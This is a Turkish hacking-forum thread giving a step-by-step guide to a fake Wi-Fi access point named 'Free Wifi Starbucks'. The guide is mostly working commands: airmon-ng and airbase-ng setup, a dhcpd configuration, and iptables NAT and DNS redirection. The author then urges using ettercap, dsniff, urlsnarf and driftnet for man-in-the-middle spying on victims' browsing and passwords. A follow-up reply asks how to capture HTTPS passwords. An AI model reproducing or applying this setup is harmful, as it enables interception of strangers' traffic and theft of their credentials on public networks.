Sahte Erişim Noktası Nasıl yapılır (1 Viewer)

hax0r.tr

<?php dAyı ?>
Joined
Oct 31, 2016
Credits
0
Rating - 0%
Yapacağımız adımları anlatım sizlere:
dhcpd.conf ayarlamak.
Airbase-ng ile erişim noktasını çalıştırmak.
IP-Tables ayarlamak.

Benim sistemim:
Kali-Linux
2 tane Wifi cihazı.
1: WLAN1 de çalışır ve gateway: 192.168.1.1. ( bu cihazda İnternet vardır ! )
2: Laptopum içinde olan wifi cihazı (atheros, WLAN0).

Haydi su dhcpd.conf dosyasının ayarını yapalım sonra devam edelim.

nano /etc/dhcp3/dhcpd.conf” komutunu çalıştıralım ve içine bu satırları yapıştıralım.

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 4.2.2.2;
range 192.168.2.130 192.168.2.140;
}

Ve CTRL-X’e basıp Y yazıp ENTER’e basilim.

Simdi baslamak için ilk öncelik ile wifi cihazımız “Monitor” modu açık olması gerekiyor.

airmon-ng

komutunu girerek bütün wifi cihazlarımız sıralanır. ( tabi airbase-ng kurulu olması gerekiyor ).

airmon-ng start wlan0

komutunu girerek wifi cihazımızın monitor modunu açarız.

airbase-ng -e “Free Wifi Starbucks” -c 9 mon0

komutunu girdiğimiz anda sahte erişim noktamız Free Wifi Starbucks isim ile çalışmış olur. ( mon0, wifi cihazımızın monitor modundaki ismi ).

Simdi yeni bir terminal açarak devam edelim.

İfconfig at0 up

komutunu calistiralim ve boylece at0 cihazi calismis olur.

ifconfig at0 192.168.2.129 netmask 255.255.255.128

komutunu çalıştıralım ve netmask ve gateway ayarını vermiş olalım.

route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

komutunu çalıştıralım ve netmask yolunu belirtelim.

Simdi DHCP sunucumuzu çalıştırabiliriz. Tabi DCHP sunucusu kurulu olması lazım.
Bunu kurmak için

sudo apt-get install dhcp3-server

yazmanız yeterli.

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd

komutunu çalıştıralım ve haklarımızı tanımış olalım.

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

komutunu çalıştıralım ve böylece DHCP sunucumuz çalıştırmış olalım.

Simdi sizin yaptığınız erişim noktası çalışıyor fakat WLAN1 cihazımızdaki İnterneti paylaşmamız gerekir, paylaşmaz isek kimse bizim erişim noktası’na bağlanmaz ( kim İnterneti olmayan erişim noktası’na bağlanırki
icon_smile.gif
).

Yeni bir Terminal açalım ve devam edelim.

iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain

komutları çalıştırarak iptables deki bütün ayarları silmiş oluyoruz.

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –table nat –append POSTROUTING –out-interface wlan1 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT –to 192.168.1.1

komutları çalıştırarak iptables’i ayarlarını yapmış oluyoruz.
Bu ayarlardaki WLAN1 ve 192.168.1.1 benim kendi ayarlarım, belki sizde farklıdır.

Simdi bunların hepsini yaptınız mi ? Hadi bakalım sahte erişim noktası çalışıyor.
Böyle bir erişim noktası ile çök kotu şeyler yapabilirsiniz. Ettercap kullanarak man-in-the-middle saldırısı yapabilirsiniz, dnssiff, wireshark, driftnet, urlsnarf kullanarak nerelere girdiğini, girerken hangi şifre kullandığını görebilirsiniz. Tabi gerisi sizin hayal gücüne kalmış
icon_smile.gif
benden bukadar.
 
Joined
Jan 24, 2019
Credits
14
Rating - 0%
emeğine sağlık bu dediklerinden wireshark'ı kullandım, sadece http protokolünü çözebildi. diğer programlar https şifreleri gösterir mi?
 

Users who are viewing this thread

Top